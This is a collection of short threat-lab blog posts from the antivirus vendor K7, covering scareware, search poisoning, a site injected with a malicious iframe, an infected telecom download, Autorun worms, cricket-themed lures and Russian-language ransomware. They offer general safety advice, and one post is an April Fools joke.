Malware authors have long realized that implementing scare tactics to rip people off their money works. Why waste time finding a new vulnerability to spread malware when you can scare people into downloading and running it? For a while now, fake anti-virus malware has been one of the top revenue generators for the malware authors.

Lately however, users have turned vigilant towards such fraudulent security tools and simply ignore the spurious warnings. The malware authors, who have realized this, have upped their game by changing the scareware reports to involve hard drive failures rather than virus infections.

Over the last month, K7TCL noticed a steady rise in the number of samples arriving with the name “pusk.exe” from various sources. Closer analysis of one sample revealed that this was a fake disk diagnostic tool. On installation the malware displays the following message:

The malware then goes on to display fake disk diagnosis messages:

It’s no surprise that when the users click on the “Fix Errors” dialogue box, they see the message below:

These samples are detected generically as “Trojan (0026b5241)”.

Lokesh Kumar
K7TCL

Miscreants are always geared up to start a new wave of spam and malware campaign. When a sensational event occurs, users tend to go searching for news on the event, making it easy for the criminals  to do what they do best.

Case in point, last week saw the Internet abuzz with news regarding Osama Bin Laden’s death.  Some research into the user’s search behavior from Google trends revealed that the maximum number of searches were for the keyword “Osama” and the maximum number of searches arrived from the United States.

The second to top the list was India, with Tamil Nadu leading the way, closely followed by Karnataka.

The bad guys tried to capitalize on this news by poisoning search results, spreading malware & spam. They setup fake videos, facebook wall posts, websites, all claiming to reveal “exclusive” information on the death of Al-Qaeda’s top man, thus enabling them to invite potential victims to their trap.

Out of approximately 1,00,000 videos uploaded to date on You-tube with the keyword “Osama”, around 23,000 were uploaded just in the past week.

Also, there were around 1,300 websites registered, in the first 3 days since the news emerged, relating to Osama’s death.

Out of these newly registered websites, the maximum number of registrations was made with the registrar “1 & 1 Internet AG”, followed by namecheap.com.

Queries in domain reputations sites like www.malwareurl.com indicate that both registrars had hosted sites that have spread exploits & spam before.

Lokesh Kumar
K7 TCL

There is nothing surprising about compromised web servers dishing out an iframe which redirects users to a potentially malicious site. K7TCL recently came across one such site which belongs to the Indian government and is currently injected with a malicious iframe.

Analyzing the contents of the iframe reveal that the iframe redirects users to urinoor.com

A quick whois on this site shows that it is registered to a user called “saamfoster”, who is infamous for registering other sites which implement “drive-by” exploits and use social engineering techniques to get users to install malware, disguised as a video codec or an anti-virus package.

Although the infiltration vector on the government site is unknown, what is known is that the website referenced by the iframe has been down for a while now. This, however, doesn’t mean that the threat has been neutralized. Many a time, we have seen old domains spring back to life and start spreading malware all over again. The site administrator not only needs to ensure that the malicious iframe is completely cleaned up, but also that the infiltration vector is investigated thoroughly, and fixed appropriately.

K7TCL attempted to contact the site administrator but our efforts were in vain.

Lokesh Kumar
K7TCL

Proactive protection is extremely important in the current threat landscape where malware change faster than the time taken for light to travel from the Sun to Earth.

Along with robust static and dynamic proactive Anti-Virus protection, K7TCL is contemplating providing a unique, bespoke service to the individual based on complex astrological calculations which have evolved since Vedic times in India.

We are hoping to help answer questions such as “How likely am I to get infected now or in the future, and with what?”. The mathematical formulae involve asterisks, i.e. “stars”, geometric positions, and “signed” comparison operations on individual horoscope data.

K7TCL advice may include corrective steps to be taken to counter any warnings of impending doom. Even under these circumstances one ought not to panic as there is always room for one’s destiny to be what one makes of it.

In addition, given the nature of fatalistic heuristics, 100% accuracy cannot be guaranteed. Nevertheless, today, the 1st of April 2011, is a “good” day to let people know about some of the plans we are considering.

Credits:
Images courtesy of vedic-academy.com and paceywilliams.com

Samir Mody
Senior Manager K7TCL

We recently noticed that one of India’s biggest telecom service providers is currently serving up an infected version of a modem application on its website. This application is infected with a notorious file infector named “Sality”. While this is not the first time that a big player in the software market has served up an infected version of an application, it simply goes on to prove that good software quality assurance is still not taken up seriously.

Quality assurance as a function in any organization should not only ensure that the code written is bug free, but is also virus free. Implementing simple security protocol during different stages of a software release cycle would go a long way in ensuring that virus free software are provided to potential users.

The build environment used to compile the source code, for example, should be secure and could be isolated. There have been known cases where malware such as “Induc” infects the source code, which in turn produces infected executables. This drives home the point that even an isolated environment still needs an Anti-Virus solution installed. Once the executable is compiled, it is imperative that it is checked for any malware infections before release.

Additionally, the hosting environment used to serve the file to the customers should especially have beefed up security practices in place. Submitting the file served by the telecom service provider to Virustotal shows that the file is detected by almost all Anti-Virus vendors. This could imply that either the server hosting the file doesn’t have any Anti-Virus solution installed, or if one is, the product could have been compromised.

Organisations which take their reputation seriously cannot afford to tarnish it by getting their customers infected, even if it were unintentional. Several attempts were made by K7TCL to contact the organization in question, but it fell on deaf ears. The malicious file is still being served in their website.

Lokesh Kumar
K7 TCL

In an anticipated move, Microsoft has recently decided to improve security on the Autorun feature available on its Windows platforms, specifically relevant to Windows XP. The solution provided by Microsoft disables applications from launching automatically from a removable device, and hopefully limits the number of malware that spread through devices such as USB drives.

For the uninitiated, Autorun is a feature that is used to run an application automatically when you insert removable media – CD, DVD, USB storage devices, etc on your computer. While it has its practical uses, this feature has been exploited over the last few years by malware to spread themselves, especially in India.

Shown below is an example of what the contents of a potential malicious autorun.inf [Configuration file for Autorun] could look like:

When a removable device containing the above autorun.inf, and its associated DeliveryReport.exe, is inserted on a Microsoft Windows XP computer with default settings, the malicious file – DeliveryReport.exe is automatically executed without any user interaction.

Below is a chart indicating the top malware types as seen by K7 from various sources in the previous quarter:

Given the absolute numbers of malware out there, the above chart shows a significant proportion of Autorun worms. When we consider K7′s Indian clients alone, the numbers are even more alarming, since almost 50% of malware submitted use Autorun to spread. Furthermore, destructive malware such as Stuxnet and Sality also have Autorun spreading capabilities.

Most Anti-Virus vendors, including K7, have already incorporated threat specific Anti-Malware security features in their products to thwart such Autorun malware. Although Microsoft’s solution is applicable only for USB storage media, and not for CD/DVDs, this optional software upgrade is still a welcome move and we implore our customers to download and install it. For more information on this software upgrade, please visit Microsoft’s site.

Lokesh Kumar
K7 TCL

It is no shocking news that cricket fans all over the world are gearing up for the upcoming ICC Cricket World Cup 2011. Apart from the sporting venue, there is one major difference between this world cup and the previous one – cyber technology has come a long way. For example, social networking sites which enable instant exchange of information, and video streaming sites which enable live streaming of events, have now become extremely popular.

Needless to say, millions of cricket fanatic Indians, in the hope of catching their favourite demigod – Sachin Tendulkar in action, will search for sites streaming the cricket match live. Innocent users need to be aware that, unfortunately, malware authors could lure you into fishing outside your off stump. They may attempt to install what purports to be a “video codec” to begin watching the stream, but this turns out to be a mechanism to deliver malware.

Malware authors can also be found attempting to spam users on social networking sites such as Facebook. Such spammed messages could eventually be used to distribute malicious code, disguised as an application intended to provide live score feeds, post match discussions, etc. Such malware could steal the user’s personal information from his/her computer.

We aren’t dissuading users from using social networking sites or watching cricket on the Internet. Rather, we are simply advising users to exercise caution while doing so, and to keep your Anti-Virus software up-to-date. If users come across such malicious applications or sites distributing malware, please feel free to send them to K7 computing’s Threat Control Lab for further analysis.

Credits:
Images courtesy of 87pestspray.com, wikipedia.com

Lokesh Kumar
K7TCL

In a consumer economy where the customer is king, we often find that product material is tailor-made for a target market. Even a good product could fail to impress if the information available on it is not effectively communicated. The Internet is no different on this aspect. For example, most consumer websites redirect a user to a localised version of the site, based on the visitor’s geographic location.

Malware authors have been quick to implement this idea in their social engineering techniques. It is now common to see spam and malicious sites use local languages to spread regional malware. Some driveby downloads, for example, deliver custom malware based on the user’s geo-location.

However some malware authors do not bother to make the extra effort. At K7TCL we recently saw an example of ransomware which appears to have come from Russia. The malware holds the computer to ransom by locking the user out. Access to the computer is denied until the victim enters a serial number, which needs to be requested from the attacker for a price. Shown below is the screenshot of the ransom message:

The point is that though the sample was accessed from an IP address originating from India, and from a site serving English content, the malware displays the ransom message in Cyrillic text. Most non-Russians are unlikely to be able to understand the ransom message, and will not even be able to decipher the text using online tools since the machine is locked out.

How does one resolve this situation? One solution could be to consult a Russian friend, and have sufficient funds in your bank account. A far better solution would be to use up-to-date Anti-Virus software. Detection and cleaning for this malware is available in K7 Total Security as Riskware ( 0015e4f01).

Lokesh Kumar
Collection Manager, K7TCL

K7 is proud to be sponsoring the international AVAR conference, this prestigious event is now in it’s 13th year, and brings together top speakers from all over the world. You will be able to hear two speakers from K7 this year, first Samir Mody, who will be discussing the problems of dealing with custom malware packers, and later K7 CTO who will be presenting a paper on malware prevalence and its importance in testing.

Drop in and say hi, see you in Bali!

In something of a record update release, Microsoft has patched 49 vulnerabilities in its software. Last year we reported on their previous huge update, but his outdoes it by 15 updates!

This is a good time to remember to keep you Windows updated, but more than that to ensure you also keep your anti-virus updated, to take care of those problems that haven’t yet been patched by software vendors.

Don’t forget that Adobe also released a slew of critical patches last week in a drive to fix some of the more critical problems in Flash and Acrobat/Reader.

Andrew Lee
CTO, K7 Computing